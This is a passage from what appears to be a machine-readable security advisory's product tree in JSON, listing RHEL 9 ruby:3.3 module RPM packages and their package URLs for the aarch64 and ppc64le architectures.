"purl": "pkg:rpm/redhat/rubygems-devel@3.5.22-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=noarch\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3)",
"product_id": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3)",
"product_id": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debuginfo@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3)",
"product_id": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debugsource@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3)",
"product_id": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3)",
"product_id": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debuginfo@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64 (ruby:3.3)",
"product_id": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debugsource@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64 (ruby:3.3)",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=aarch64\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3)",
"product_id": "rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3)",
"product_id": "rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debuginfo@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3)",
"product_id": "rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-mysql2-debugsource@0.5.5-3.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3)",
"product_id": "rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3)",
"product_id": "rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debuginfo@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le (ruby:3.3)",
"product_id": "rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-pg-debugsource@1.5.4-2.module%2Bel9.7.0%2B24119%2Bccc80daf?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le (ruby:3.3)",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-6.module%2Bel9.7.0%2B24248%2B66578cbb?arch=ppc64le\u0026rpmmod=ruby:3.3:9070020260428163621:9"
}
}
},
{
"category": "product_version",
